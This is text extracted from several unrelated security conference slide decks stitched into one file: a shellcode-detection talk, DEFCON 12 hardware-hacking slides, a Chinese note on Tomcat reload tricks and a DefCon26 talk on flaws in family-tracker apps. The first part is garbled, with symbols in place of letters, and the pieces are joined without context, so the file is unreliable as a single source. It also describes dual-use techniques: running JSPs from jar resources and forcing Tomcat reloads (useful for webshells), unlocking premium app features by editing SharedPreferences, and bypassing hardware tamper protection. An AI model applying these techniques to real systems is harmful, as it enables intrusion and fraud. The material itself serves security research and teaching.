Correct&disassembly&for&chain&of&at&least&K&instruc;ons; • Command&of&CPU&mode&switching&(BX&Rm); • Exis;ng&of&Get3UsePC&code; • Number&of&specific&paJerns&(&arguments&ini;aliza;ons,&func;on&calls&)&exceeds& some&threshold; • Arguments&inializa;on&strictly&before&system&calls&; • Write&to&memory&and&load&from&memory&cycles; • Return&address&in&some&range&of&values; • Last&instruc;on&in&the&chain&is&(BL,&BLX),&or&system&call&(svc); • Operands!of!self3iden?fied!code!and!code!with!indirect!jumps!must!to!be! ini?alized. Correct disassembly for a chain of at least K instructions! Non!a!shellcode! Shellcode!! @SadieSv!!!!!!!@_IvanPetrov_! Non!a!shellcode! Non!a!shellcode! Non!a!shellcode! Command of CPU mode switching (!BX !Rm )! CPU!mode!switch! Shellcode!in!Thumb! mode! Arguments!for!system!call! PC!register! Jump!with!exchange! Thumb!mode!number! @SadieSv!!!!!!!@_IvanPetrov_! Existing of!!Get3UsePC code! PC!register! Encrypted!shellcode! Get!PC! Use!PC! Get!PC!into!LR!register!(r14)! Use!PC! @SadieSv!!!!!!!@_IvanPetrov_! Arguments initializations for system calls and library calls! Arguments! System!call!number! System!call! _socket!!#281! _connect!!!#283! @SadieSv!!!!!!!@_IvanPetrov_! Write to memory and load from memory cycles! Encrypted!shellcode! Read!from!memory! Store!to!memory! Cycle!counter! Address!of!encrypted! payload! Main!cycle! @SadieSv!!!!!!!@_IvanPetrov_! Return address in some range of values! Return! address! Vulnerable! buffer! Stack! Payload! Shellcode! 0xbeffedbc& 0xbeffedbc& 0xbeffedbc& 0xbeffedbc& 0xbeffedbc& 0xbeffedbc& Return!address! zone! @SadieSv!!!!!!!@_IvanPetrov_! Dynamic features •  The&number&of&payload&reads&exceeds&threshold; •  The&number&of&unique&writes&into&memory&exceeds& threshold; •  Control&flow&is&redirected&to&“just&wriJen”&address& loca;on&at&least&once; •  Number&of&executed&wx3instruc;ons&exceeds&threshold; •  Condi;onal3based&signatures.& @SadieSv!!!!!!!@_IvanPetrov_! Read and write to memory! Decryptor! Encrypted!payload! N!Unique!reads!and!writes! @SadieSv!!!!!!!@_IvanPetrov_! Control flow switch! Decryptor! Decrypted!payload! Control!flow! @SadieSv!!!!!!!@_IvanPetrov_! Conditional - based signatures! Z!=!0!&!C!=!0! Z!=!1!&!C!=!0! ! ADDEQS!r0,!r1! ADDEQS!r0,!r1! AL!block!! (every!flag)! AL!block!! (every!flag)! CS!block! (!С!==!1)! Z!=!0! С!=!1! CS!block! (!С!==!1)! NE!block! (!Z!==!0)! NE!block! (!Z!==!0)! ADDCCS!r3,!r4! ADDCCS!r3,!r4! Z!=!1! С!=!0! ! If!EQ!block!was! executed,!then!! Z!=!1,!else!Z!=!0! NE!block! (!Z!==!0)! NE!block! (!Z!==!0)! @SadieSv!!!!!!!@_IvanPetrov_! Hybrid classifier @SadieSv!!!!!!!@_IvanPetrov_! What’s next Make! another! module! to! shellcode! detec?on! tool! 3!! Demorpheus& @SadieSv!!!!!!!@_IvanPetrov_! Experiments • Shellcodes; • Legi?mate!binaries; • Random!data; • Mul?media. @SadieSv!!!!!!!@_IvanPetrov_! Experiments! @SadieSv!!!!!!!@_IvanPetrov_! Datasets! FN! FP! Shellcodes! 0! n/a! LegiDmate!binaries! n/a! 1.1! MulDmedia!! n/a! 0.33! Random!data!! n/a! 0.27! @SadieSv!!!!!!!@_IvanPetrov_! Dataset! Throughput! Shellcodes! 56.5!Mb/s! LegiDmate!binaries! 64.8!Mb/s! MulDmedia! 93.8!Mb/s! Random!data! 99.5!Mb/s! 2!GHZ!Intel!Core!i7! Experiments! Your questions? @SadieSv!!!!!!!@_IvanPetrov_!
pdf
1 Advanced Hardware Hacking Techniques Joe Grand (Kingpin) joe@grandideastudio.com DEFCON 12 Friday, July 30 2 © 2004 Grand Idea Studio, Inc. Agenda The "What" and "Why" of Hardware Hacking Enclosure & Mechanical Attacks Electrical Attacks Final Thoughts and Conclusions 3 © 2004 Grand Idea Studio, Inc. What is Hardware Hacking (to me)? Doing something with a piece of hardware that has never been done before – Personalization and customization (e.g., "hot rodding for geeks") – Adding functionality – Capacity or performance increase – Defeating protection and security mechanisms (not for profit) Creating something extraordinary Harming nobody in the process 2 4 © 2004 Grand Idea Studio, Inc. Why Hardware Hacking? Curiosity – To see how things work Improvement and Innovation – Make products better/cooler – Some products are sold to you intentionally limited or "crippled" Consumer Protection – I don't trust glossy marketing brochures...do you? 5 © 2004 Grand Idea Studio, Inc. Hardware Security Myths Many security-related products rely on misconceptions to remain "secure" Hardware hacking is hard Consumers lack the competency or courage to void their warranty Therefore, hardware is "safe" 6 © 2004 Grand Idea Studio, Inc. Gaining Access to a Product Purchase – Buy the product from a retail outlet (with cash) Evaluation – Rent or borrow the product Active – Product is in active operation, not owned by attacker Remote Access – No physical access to product, attacks launched remotely 3 7 © 2004 Grand Idea Studio, Inc. Attack Vectors Interception (or Eavesdropping) – Gain access to protected information without opening the product Interruption (or Fault Generation) – Preventing the product from functioning normally Modification – Tampering with the product, typically invasive Fabrication – Creating counterfeit assets of a product 8 © 2004 Grand Idea Studio, Inc. Enclosure & Mechanical Attacks Opening Housings External Interfaces Anti-Tamper Mechanisms Conformal Coating and Epoxy Encapsulation Removal 9 © 2004 Grand Idea Studio, Inc. Opening Housings Goal is to get access to internal circuitry Usually as easy as loosening some screws or prying open the device 4 10 © 2004 Grand Idea Studio, Inc. Opening Housings 2 If glue is used to seal housing, use heat gun to soften glue and pry open with a knife – Some designers use glue with a high-melting point - enclosure will melt/deform before the glue does Some devices are sonically-welded to create a one-piece outer shell – If done properly, will require destruction of device in order to open it 11 © 2004 Grand Idea Studio, Inc. Opening Housings 3 Security bits and one-way screws – Used to prevent housings from being easily opened – Ex.: Bathroom stalls, 3.8mm and 4.5mm security bit for Nintendo and Sega game cartridges/systems – To identify a particular bit type, visit www.lara.com/reviews/screwtypes.htm – Bits available at electronics stores, swapmeets, online 12 © 2004 Grand Idea Studio, Inc. External Interfaces Usually a product's lifeline to the outside world – Manufacturing tests, field programming/upgrading, peripheral connections – Ex.: JTAG, RS232, USB, Firewire, Ethernet Wireless interfaces also at risk (though not discussed here) – Ex.: 802.11b, Bluetooth Any interface that connects to a third-party may contain information that is useful for an attack – Could possibly obtain data, secrets, etc. 5 13 © 2004 Grand Idea Studio, Inc. External Interfaces 2 Look for obfuscated interfaces – Ex.: Proprietary or out-of-the-ordinary connector types, hidden access doors or holes Many times, test points just hidden by a sticker 14 © 2004 Grand Idea Studio, Inc. External Interfaces 3 Use multimeter or oscilloscope to probe and determine functionality – Logic state of pins can help with an educated guess – Ex.: Pull pins high or low, observe results, repeat Monitor communications using H/W or S/W-based protocol analyzer – USB: SnoopyPro – RS232 and parallel port: PortMon Send intentionally malformed/bad packets to cause a fault – If firmware doesn't handle this right, device could trigger unintended operation useful for an attack 15 © 2004 Grand Idea Studio, Inc. External Interfaces: Backdoors Architecture-specific debug and test interfaces (usually undocumented) Diagnostic serial ports – Provides information about system, could also be used for administration – Ex.: Intel NetStructure crypto accelerator administrator access [1] Developer's backdoors – Commonly seen on networking equipment, telephone switches – Ex.: Palm OS debug mode [2] – Ex.: Sega Dreamcast CD-ROM boot 6 16 © 2004 Grand Idea Studio, Inc. External Interfaces: JTAG JTAG (IEEE 1149.1) interface is often the Achilles' heel Industry-standard interface for testing and debugging – Ex.: System-level testing, boundary-scanning, and low- level testing of dies and components Can provide a direct interface to hardware – Has become a common attack vector – Ex.: Flash memory reprogramming on Pocket PC devices (www.xda-developers.com/jtag) 17 © 2004 Grand Idea Studio, Inc. External Interfaces: JTAG 2 Five connections (4 required, 1 optional): ← TDO = Data Out (from target device) → TDI = Data In (to target device) → TMS = Test Mode Select → TCK = Test Clock → /TRST = Test Reset (optional) H/W interface to PC can be built with a few dollars of off-the-shelf components – Ex.: www.lart.tudelft.nl/projects/jtag, http://jtag-arm9.sourceforge.net/circuit.txt, or ftp://www.keith-koep.com/pub/arm-tools/jtag/ jtag05_sch.pdf 18 © 2004 Grand Idea Studio, Inc. External Interfaces: JTAG 3 JTAG Tools (http://openwince.sourceforge.net/jtag) serves as the S/W interface on the PC Removing JTAG functionality from a device is difficult – Designers usually obfuscate traces, cut traces, or blow fuses, all of which can be repaired by an attacker 7 19 © 2004 Grand Idea Studio, Inc. Anti-Tamper Mechanisms Primary facet of physical security for embedded systems Attempts to prevent unauthorized physical or electronic tampering against the product Most effectively used in layers Possibly bypassed with knowledge of method – Purchase one or two devices to serve as "sacrificial lambs" 20 © 2004 Grand Idea Studio, Inc. Anti-Tamper Mechanisms 2 Tamper Resistance – Specialized materials used to make tampering difficult – Ex.: One-way screws, epoxy encapsulation, sealed housings Tamper Evidence – Ensure that there is visible evidence left behind by tampering – Only successful if a process is in place to check for deformity – Ex.: Passive detectors (seals, tapes, glues), special enclosure finishes (brittle packages, crazed aluminum, bleeding paint) 21 © 2004 Grand Idea Studio, Inc. Anti-Tamper Mechanisms 3 Tamper Detection – Enable the hardware device to be aware of tampering – Switches: Detect the opening of a device, breach of security boundary, or movement of a component – Sensors: Detect an operational or environmental change – Circuitry: Detect a puncture, break, or attempted modification of the security envelope 8 22 © 2004 Grand Idea Studio, Inc. Anti-Tamper Mechanisms 4 Tamper Response – Countermeasures taken upon the detection of tampering – Ex.: Zeroize critical memory, shutdown/disable/destroy device, enable logging features Physical Security Devices for Computer Subsystems [3] provides comprehensive attacks and countermeasures – Ex.: Probing, machining, electrical attacks, physical barriers, tamper evident solutions, sensors, response technologies 23 © 2004 Grand Idea Studio, Inc. Conformal Coating and Epoxy Encapsulation Removal Encapsulation used to protect circuitry from moisture, dust, mold, corrosion, or arcing Epoxy or urethane coatings leave a hard, difficult to remove film 24 © 2004 Grand Idea Studio, Inc. Conformal Coating and Epoxy Encapsulation Removal 2 The good news: The coatings are not specifically designed for security – Can usually be bypassed with special chemicals like MG Chemicals' 8310 Conformal Coating Stripper (www.mgchemicals.com) Brute force approach: Dremel tool and wooden skewer as a drill bit – Doesn't damage the components underneath coating – Might remove the soldermask, but not a big deal... 9 25 © 2004 Grand Idea Studio, Inc. Conformal Coating and Epoxy Encapsulation Removal 3 When all else fails, use X-ray to determine location of components or connections 26 © 2004 Grand Idea Studio, Inc. Electrical Attacks Surface Mount Devices Probing Boards Memory and Programmable Logic Chip Delidding and Die Analysis Emissions and Side-Channel Attacks Clock and Timing 27 © 2004 Grand Idea Studio, Inc. Surface Mount Devices Harder to work with than through-hole devices – Ex.: Fine-pitched packages, tiny discrete components – Don't get discouraged Human hands have more resolution than the naked eye can resolve – A microscope can go a long way to solder components Circuit Cellar, July 2004: Build your own computer-controlled, temperature-adjusting SMT oven 10 28 © 2004 Grand Idea Studio, Inc. Surface Mount Devices 2 Easy to desolder using ChipQuik SMD Removal Kit (www.chipquik.com) 29 © 2004 Grand Idea Studio, Inc. Probing Boards Look for test points and exposed traces/bus lines Surface mount leads and points are usually too small to manually probe Many ways to access: – Solder probe wire onto board using microscope – Use an SMD micrograbber ($5-$50) – Use a probe adapter (> $100) from www.emulation.com, www.ironwoodelectronics.com, or www.advintcorp.com – Build your own probe 30 © 2004 Grand Idea Studio, Inc. Probing Boards 2 Ex.: Tap board used to intercept data transfer over Xbox's HyperTransport bus [4] 11 31 © 2004 Grand Idea Studio, Inc. Memory and Programmable Logic Most memory is notoriously insecure – Not designed with security in mind – Serial EEPROMs can be read in-circuit, usually SPI or I2C bus (serial clock and data) [5] Difficult to securely and totally erase data from RAM and non-volatile memory [6] – Remnants may exist and be retrievable from devices long after power is removed – Could be useful to obtain program code, temporary data, crypto keys, etc. 32 © 2004 Grand Idea Studio, Inc. Memory and Programmable Logic 2 SRAM-based FPGAs most vulnerable to attack – Must load configuration from external memory – Bit stream can be monitored to retrieve entire configuration To determine PLD functionality, try an I/O scan attack – Cycle through all possible combinations of inputs to determine outputs 33 © 2004 Grand Idea Studio, Inc. Memory and Programmable Logic 3 Security fuses and boot-block protection – Enabled for "write-once" access to a memory area or to prevent full read back – Usually implemented in any decent design – Might be bypassed with die analysis attacks (FIB) or electrical faults [7] – Ex.: PIC16C84 attack in which security bit is removed by increasing VCC during repeated write accesses 12 34 © 2004 Grand Idea Studio, Inc. Chip Decapping and Die Analysis Analysis of Integrated Circuit (IC) dies is typically the most difficult area for hardware hacking With access to the IC die, you can: – Retrieve contents of Flash, ROM, FPGAs, other non- volatile devices (firmware and crypto keys stored here) – Modify or destroy gates and other silicon structures (e.g., reconnect a security fuse that prevents reading of the device) 35 © 2004 Grand Idea Studio, Inc. Chip Decapping and Die Analysis 2 The good thing is that IC designers make mistakes, so tools are needed – Failure analysis – Chip repair and inspection What tools? – Chip Decappers – Scanning Electron Microscope (SEM) – Voltage Contrast Microscopy – Focused Ion Beam (FIB) 36 © 2004 Grand Idea Studio, Inc. Chip Decapping and Die Analysis 3 Equipment available on the used/surplus market Access to tools in most any large academic institution Reverse engineering and analysis services exist (still high priced, $10k-$20k) – Can provide functional investigation, extraction, IC simulation, analyze semiconductor processes, etc. – Ex.: Semiconductor Insights (www.semiconductor.com) and Chipworks (www.chipworks.com) 13 37 © 2004 Grand Idea Studio, Inc. Chip Decapping and Die Analysis: IC Decapsulation Decapsulation tools used to "delid" or "decap" the top of the IC housing Uses chemical or mechanical means (or both) Will keep the silicon die intact while removing the outer material Ex.: Nippon Scientific (www.nscnet.co.jp/e), Nisene Technology Group (www.nisene.com), ULTRA TEC Manufacturing (www.ultratecusa. com), approx. $30k new, $15k used 38 © 2004 Grand Idea Studio, Inc. Chip Decapping and Die Analysis: Scanning Electron Microscope Used to perform sub-micron inspection of the physical die Metal or other material layers might need to be de-processed before access to gate structures Depending on ROM size and properties, can visually recreate contents (Photos from ADSR Ltd. and FIB International) 39 © 2004 Grand Idea Studio, Inc. Chip Decapping and Die Analysis: Voltage Contrast Microscopy Detect variances of voltages and display them as contrast images – Performed with a SEM Ex.: Could extract information from a Flash ROM storage cell (Photo from http://testequipmentcanada.com/VoltageContrastPaper.html) 14 40 © 2004 Grand Idea Studio, Inc. Chip Decapping and Die Analysis: Focused Ion Beams Send a focused stream of ions onto the surface of the chip – Beam current and optional use of gas/vapor changes the function Cutting – Ex.: Cut a bond pad or trace from the die ($1k-$10k) Deposition – Ex.: Add a jumper/reconnect a trace on the die ($1k- $10k) 41 © 2004 Grand Idea Studio, Inc. Chip Decapping and Die Analysis: Focused Ion Beams 2 Imaging – High-resolution image of die structure Ex.: Fibics Incorporated (www.fibics.com) or FIB International (www.fibinternational.com) (Photos from Fibics Incorporated) 42 © 2004 Grand Idea Studio, Inc. Chip Decapping and Die Analysis: Focused Ion Beams 3 (Photos from Fibics Incorporated) 15 43 © 2004 Grand Idea Studio, Inc. Emissions and Side-Channel Attacks All devices leak information – EMI (electromagnetic interference) from circuits (TEMPEST) [8, 9] – Power supply fluctuations – Visible radiation from LEDs and monitors [10, 11] Can be monitored and used by attacker to determine secret information Devices may also be susceptible to RF or ESD (immunity) – Intentionally injected to cause failure 44 © 2004 Grand Idea Studio, Inc. Emissions and Side-Channel Attacks: Power Supply Simple Power Analysis (SPA) – Attacker directly observes power consumption – Varies based on microprocessor operation – Easy to identify intensive functions (cryptographic) Differential Power Analysis (DPA) [12] – Advanced mathematical methods to determine secret information on a device 45 © 2004 Grand Idea Studio, Inc. Clock and Timing Attacks rely on changing or measuring timing characteristics of the system Active (Invasive) timing attacks – Vary clock (speed up or slow down) to induce failure or unintended operation Passive timing attacks – Non-invasive measurements of computation time – Different tasks take different amounts of time 16 46 © 2004 Grand Idea Studio, Inc. "Security through obscurity" does not work – Provides a false sense of security to designers/users – Might temporarily discourage an attacker, but it only takes one to discover it Weak tactics to look out for when hacking "secure" hardware products: – Encoded forms of fixed data – Scrambled address lines through extra logic – Intentionally messy/lousy code – Spurious and meaningless data ("signal decoys") Security Through Obscurity 47 © 2004 Grand Idea Studio, Inc. Advances in chip packaging – Ultra-fine pitch and chip-scale packaging (e.g., BGA, COB, CIB) – Not as easy to access pins/connections to probe – Discrete components can now easily be inhaled Highly-integrated chips (sub-micron) – Difficult, but not impossible, to probe and modify High speed boards – Processor and memory bus > hundreds of MHz – Serial bus speeds approaching Gigabit/sec. Hardware Hacking Challenges 48 © 2004 Grand Idea Studio, Inc. Cost of equipment – Advanced tools still beyond the reach of average hobbyist (probing, decapping, SEMs, etc.) – "State of the art" defined by what hackers can find in the trash and at swapmeets Societal pressures – Hardware hacking is practically mainstream, but "hacker" is still a naughty word Hardware Hacking Challenges 2 17 49 © 2004 Grand Idea Studio, Inc. Conclusions Hardware hacking is approaching a mainstream activity Plays an important role in the balance between consumers and corporations (e.g., The Man) Think as a designer would Nothing is ever 100% secure – Given enough time, resources, and motivation, you can break anything The possibilities are endless Have fun! 50 © 2004 Grand Idea Studio, Inc. References 1. J. Grand, et al, "Hack Proofing Your Network: 2nd Edition," Syngress Publishing, 2002, www.grandideastudio.com/files/books/hpyn2e_chapter14.pdf 2. J. Grand (Kingpin), “Palm OS Password Lockout Bypass,” March 2001, www.grandideastudio.com/files/security/mobile/ palm_backdoor_debug_advisory.txt 3. S.H. Weingart, "Physical Security Devices for Computer Subsystems: A Survey of Attacks and Defenses,'' Workshop on Cryptographic Hardware and Embedded Systems, 2000. 4. A. Huang, "Hacking the Xbox: An Introduction to Reverse Engineering," No Starch Press, 2003. 5. J. Grand (Kingpin), "Attacks on and Countermeasures for USB Hardware Token Devices,'' Proceedings of the Fifth Nordic Workshop on Secure IT Systems, 2000, www.grandideastudio.com/files/security/tokens/usb_hardware_ token.pdf 6. P. Gutmann, "Secure Deletion from Magnetic and Solid-State Memory Devices," Sixth USENIX Security Symposium, 1996, www.usenix.org/publications/ library/proceedings/sec96/full_papers/gutmann/index.html 51 © 2004 Grand Idea Studio, Inc. References 2 7. S. Skorobogatov, "Breaking Copy Protection in Microcontrollers," www.cl.cam.ac.uk/~sps32/mcu_lock.html 8. W. van Eck, “Electronic Radiation from Video Display Units: An Eavesdropping Risk?” Computers and Security, 1985, www.jya.com/emr.pdf 9. J.R. Rao and P. Rohatgi, "EMPowering Side-Channel Attacks," IBM Research Center, www.research.ibm.com/intsec/emf-paper.ps 10. Joe Loughry and D.A. Umphress, "Information Leakage from Optical Emanations," ACM Transactions on Information and System Security v.5, #3, August 2002, www.applied-math.org/optical_tempest.pdf 11. M. Kuhn, "Optical Time-Domain Eavesdropping Risks of CRT Displays," Proceedings of the 2002 IEEE Symposium on Security and Privacy, May 2002, www.cl.cam.ac.uk/~mgk25/ieee02-optical.pdf 12. P. Kocher, J. Jaffe, and B. Jun, "Overview of Differential Power Analysis," www.cryptography.com/resources/whitepapers/DPATechInfo.PDF 18 52 © 2004 Grand Idea Studio, Inc. Appendix A: Additional Resources J. Grand, et al, "Hardware Hacking: Have Fun While Voiding Your Warranty," Syngress Publishing, January 2004. J. Grand, "Practical Secure Hardware Design for Embedded Systems," Proceedings of the 2004 Embedded Systems Conference, 2004, www.grandideastudio.com/ files/security/hardware/practical_secure_hardware_design.pdf A. Huang, "Keeping Secrets in Hardware: the Microsoft XBox Case Study," Massachusetts Institute of Technology AI Memo 2002-008, May 2002, http://web.mit.edu/bunnie/www/proj/anatak/AIM-2002-008.pdf F. Beck, "Integrated Circuit Failure Analysis - A Guide to Preparation Techniques," John Wiley & Sons, 1998. O. Kömmerling and M. Kuhn, "Design Principles for Tamper-Resistant Smartcard Processors," USENIX Workshop on Smartcard Technology, 1999, www.cl.cam. ac.uk/~mgk25/sc99-tamper.pdf R.G. Johnston and A.R.E. Garcia, "Vulnerability Assessment of Security Seals", Journal of Security Administration, 1997, www.securitymanagement.com/ library/lanl_00418796.pdf 53 © 2004 Grand Idea Studio, Inc. Appendix B: Related Web Sites Cambridge University Security Group - TAMPER Laboratory, www.cl.cam.ac.uk/Research/Security/tamper Molecular Expressions: Chip Shots Gallery, http://microscopy.fsu.edu/chipshots/index.html Bill Miller's CircuitBending.com, http://billtmiller.com/circuitbending Virtual-Hideout.Net, www.virtual-hideout.net LinuxDevices.com - The Embedded Linux Portal, www.linuxdevices.com Roomba Community - Discussing and Dissecting the Roomba, www.roombacommunity.com TiVo Techies, www.tivotechies.com 54 © 2004 Grand Idea Studio, Inc. Appendix C: Tools of the Warranty Voiding Trade Bright overhead lighting or desk lamp Protective gear (mask, goggles, rubber gloves, smock, etc.) ESD protection (anti-static mat and wriststrap) Screwdrivers X-ACTO hobby knife Dremel tool Needle file set 19 55 © 2004 Grand Idea Studio, Inc. Appendix C: Tools of the Warranty Voiding Trade 2 Wire brushes Sandpaper Glue Tape Cleaning supplies Variable-speed cordless drill w/ drill bits Heat gun and heat-shrink tubing Center punch 56 © 2004 Grand Idea Studio, Inc. Appendix C: Tools of the Warranty Voiding Trade 3 Nibbling tool Jigsaw Wire stripper/clipper Needle-nose pliers Tweezers Soldering iron w/ accessories (solder sucker, various tips, etc.) Basic electronic components 57 © 2004 Grand Idea Studio, Inc. Appendix C: Tools of the Warranty Voiding Trade 4 Microscope Digital and analog multimeters Adjustable power supply Device programmer UV EPROM eraser PCB etching kit Oscilloscope Logic Analyzer 20 58 © 2004 Grand Idea Studio, Inc. Appendix D: Where to Obtain the Tools The Home Depot (www.homedepot.com) Lowe's (www.lowes.com) Hobby Lobby (www.hobbylobby.com) McMaster-Carr (www.mcmaster.com) Radio Shack (www.radioshack.com) Digi-Key (www.digikey.com) Contact East (www.contacteast.com) Test Equity (www.testequity.com) Thanks! Joe Grand (Kingpin) joe@grandideastudio.com
pdf
@Y4tacker 两个好玩的问题 1.为什么往 /WEB-INF/tomcat-web.xml/ /WEB-INF/tomcat-web.xml/ ⽂件夹下写东西可以触发重加载 问题来源 问题的⼀切来源于⼀句话: Trigger a reload of the web app by writing any file to /WEB-INF/tomcat-web.xml/ ,⽂件夹 什么⿁! 当然多提⼀嘴不是每个版本这个tomcat-web.xml都⽣效的具体看配置,详细的往下看 解决 ⾸先既然能够在tomcat运⾏后继续加载新的jar到jvm,如果是你会怎么实现呢,答案很显然, 多线程,定时让⼀个⼦进程去监控⽂件的变化,tomcat也是如此,具体的就不多说了,也不是 本篇的重点,这⾥只是简单提⼀嘴 关于本篇要探索的问题,我本来也确实不清楚,但是昨天看到⼀句话 嗯?看到这个我愣了⼀下,因为在我第⼀认知⾥⾯都是⽹上说的web.xml,这个加了个前缀 tomcat又是什么,并且为什么创建⽬录也能被识别到内容变化呢(今天⼀位师傅与我讨论) ⾸先谈谈我的第⼀想法,我⼀开始猜测是扫描到这个 /WEB-INF/tomcat-web.xml/ ,发现是 ⽬录,是不是就去通过遍历⽬录下的⽂件内容看是否有变化呢 但是答案是No,我跟了下源码,这⾥我们节约时间从关键的说 起 org.apache.catalina.startup.HostConfig#checkResources , 我们来看看checkResources是⼲嘛的,会去检查哪些资源这⾥也很清楚了 我们这⾥研究的是 /WEB-INF/tomcat-web.xml/ ,继续往下看 往下看,关注下 光看lastModified我就⼤概猜到了是靠什么机制了,没错时间戳!当前⽂件夹下的⽂件变动了 ⾃然也会影响⽂件夹的时间戳变化,不过都来了当然还是进去看看嘛 Trigger a reload of the web app by writing any file to `/WEB-INF/tomcat- web.xml/` long lastModified = app.reloadResources.get(s).longValue(); 确实如此,后⾯通过reload也就重新将 /WEB-INF/lib 下的jar加载进去了,昨天提过这⾥不再 多讲 好了到了这⾥又是⼀个问题,刚才我们的资源路径是怎么取得的? app.reloadResources 这值是怎么来的呢,其实是在tomca⾸次运⾏时就设置了, 在 org.apache.catalina.core.StandardContext#addWatchedResource 中便引⼊了, 那值是哪来的,在 项⽬路径/conf/context.xml 哦⼀切也就解决了,通过配置WatchedResource来监视,这也是默认名称 2.Tomcat下/META-INF/lib中被加载的jar,如果在其/META- INF/resources/下直接写jsp可以直接访问执⾏ <Context> <WatchedResource>WEB-INF/web.xml</WatchedResource> <WatchedResource>WEB-INF/tomcat-web.xml</WatchedResource> <WatchedResource>${catalina.base}/conf/web.xml</WatchedResource> </Context> 问题来源 很骚的东西,第⼀次看到,马上吃饭了,简单看了下 ⾸先⼤概说⼀下浏览器敲下 htttp://xxx/xx.jsp时候 ,它会检查jsp⽂件是否存在来避免创 建垃圾⽂件夹和⽂件,也就是在 org.apache.jasper.servlet.JspServlet#serviceJspFile 下的 往⾥⼀直跟,最终⼀个关键的点 在 org.apache.catalina.webresources.CachedResource#validateResource 下 这个JarResource⾥⾯有映射关系,我们简简单单看看webResource咋来的 if (null == context.getResource(jspUri)) { 这⾥只是初始化其他地⽅也没有 后⾯找了下 在 org.apache.jasper.servlet.JspCServletContext#scanForResourceJARs 找到了 答案 拿下!!!
pdf
All your family secrets belong to us - Worrisome security issues in tracker apps Siegfried Rasthofer | Fraunhofer SIT, Germany Stephan Huber | Fraunhofer SIT, Germany DefCon26, August 11th 2018 Who are we? § Head of Department Secure Software Engineering § PhD, M.Sc., B.Sc. in computer science § Static and Dynamic Code Analysis § Founder of @TeamSIK and @CodeInspect § Security Researcher @Testlab Mobile Security § Code Analysis Tool development § IOT Stuff § Founder of @TeamSIK Siegfried Stephan 2 Who are we? § Head of Department Secure Software Engineering § PhD, M.Sc., B.Sc. in computer science § Static and Dynamic Code Analysis § Founder of @TeamSIK and @CodeInspect § Security Researcher @Testlab Mobile Security § Code Analysis Tool development § IOT Stuff § Founder of @TeamSIK Siegfried Stephan (creds to: Alex, Daniel, Julien, Julius, Michael, Philipp, Steven, Kevin, Sebald, Ben) 3 Team 4 Beer Announcement 5 Agenda 6 § Introduction/Motivation § Background Information § Bad Client-Side Checks with SharedPreferences § Client-Side and Communication Vulnerabilities § Server-Side Vulnerabilities § Responsible Disclosure Process § Summary Agenda 7 § Introduction/Motivation § Background Information § Bad Client-Side Checks with SharedPreferences § Client-Side and Communication Vulnerabilities § Server-Side Vulnerabilities § Responsible Disclosure Process § Summary Surveillance - Then 1960: Radio receiver inside pipe 1960: Camera inside a pack of cigarettes 1970: Microphone inside a dragonfly 1990: Microphone inside a fake catfish * Source: http://www.businessinsider.com/ 8 Surveillance - Now 9 Sypware/RAT Surveillance - Now 10 Benign Reasons? Sypware/RAT Surveillance - Now 11 Benign Reasons? Family Couple Friends Good vs. Bad 12 Family Couple Friends Sypware/RAT Surveillance - Apps 13 Google PlayStore Android Security Report 2017 Surveillance - Apps 14 Google PlayStore *Android Security Report 2017 15 How well are the tracking data protected? 16 App Name GooglePlay Downloads Couple1Tracker1App 5-101m My1Family1GPS1Tracker KidControll GPS1Tracker Rastrear Celular Por el1Numero Phone1Tracker1By1Number Couple1Vow Real1Time1GPS1Tracker Ilocatemobile 1-5m Family1Locator1(GPS) Free1Cell1Tracker Rastreador de1Novia Phone1Tracker1Free Phone1Tracker1Pro Rastreador de1Celular Avanzado 100-500k Rastreador de1Novia Localiser un1Portable1avec1son1Numero 50-100k Handy1Orten per1Handynr 10-50k Track1My1Family 1k 17 App Name GooglePlay Downloads Couple1Tracker1App 5-101m My1Family1GPS1Tracker KidControll GPS1Tracker Rastrear Celular Por el1Numero Phone1Tracker1By1Number Couple1Vow Real1Time1GPS1Tracker Ilocatemobile 1-5m Family1Locator1(GPS) Free1Cell1Tracker Rastreador de1Novia Phone1Tracker1Free Phone1Tracker1Pro Rastreador de1Celular Avanzado 100-500k Rastreador de1Novia Localiser un1Portable1avec1son1Numero 50-100k Handy1Orten per1Handynr 10-50k Track1My1Family 1k Takeaways 18 It is very easy to… § Enable premium features without paying § Access highly sensitive data of a person § Perform mass surveillance in real-time Agenda 19 § Introduction/Motivation § Background Information § Bad Client-Side Checks with SharedPreferences § Client-Side and Communication Vulnerabilities § Server-Side Vulnerabilities § Responsible Disclosure Process § Summary How does it work? – Very simple 20 push Observer Monitored Person pull Tracking Provider (backend/cloud) What kind of data? 21 push Observer Monitored Person pull What kind of data? 22 push Observer Monitored Person pull Attack Vectors 23 push Observer Monitored Person pull Attack Vectors 24 push Observer Monitored Person pull Attack Vectors 25 push Observer Monitored Person pull Agenda 26 § Introduction/Motivation § Background Information § Bad Client-Side Checks with SharedPreferences § Client-Side and Communication Vulnerabilities § Server-Side Vulnerabilities § Responsible Disclosure Process § Summary 101 27 1. Authentication Request 2. Authorization Request WTF? 28 1. Request Data 2. Client-Side “Authorization” WTF 1/4 – Enable Premium Features 29 WTF 1/4 – Enable Premium Features 30 N = com.google.android.gms.ads.g; if(!this.n.getBoolean("l_ads", false)) { ... } else { this.N.setVisibility(View.GONE); } WTF 1/4 – Enable Premium Features 31 /data/data/com.bettertomorrowapps.spyyourlovefree/ shared_prefs/loveMonitoring.xml <boolean name="l_location_full" value="false" /> <boolean name="l_fb_full" value="false" /> <boolean name="l_loc" value="false" /> <boolean name="l_sms" value="false" /> <boolean name="l_ads" value="false" /> <boolean name="l_sms_full" value="false" /> <boolean name="l_call" value="false" /> <boolean name="l_fb" value="false" /> N = com.google.android.gms.ads.g; if(!this.n.getBoolean("l_ads", false)) { ... } else { this.N.setVisibility(View.GONE); } SharedPreferences Backup/Restore § Rooted1device: 1. copy1loveMonitoring.xml from1app1folder1to1pc 2. modify1file,1set1false1to1true 3. copy1back1and1overwrite1orig.1file1with1modified1file § Unrooted1device: adb backup adb restore convert * modify file *https://github.com/nelenkov/android-backup-extractor adb tool WTF 1/4 – Enable Premium Features 33 /data/data/com.bettertomorrowapps.spyyourlovefree/ shared_prefs/loveMonitoring.xml <boolean name="l_location_full" value="false" /> <boolean name="l_fb_full" value="false" /> <boolean name="l_loc" value="false" /> <boolean name="l_sms" value="false" /> <boolean name="l_ads" value="false" /> <boolean name="l_sms_full" value="false" /> <boolean name="l_call" value="false" /> <boolean name="l_fb" value="false" /> WTF 1/4 – Enable Premium Features 34 /data/data/com.bettertomorrowapps.spyyourlovefree/ shared_prefs/loveMonitoring.xml <boolean name="l_location_full" value="false" 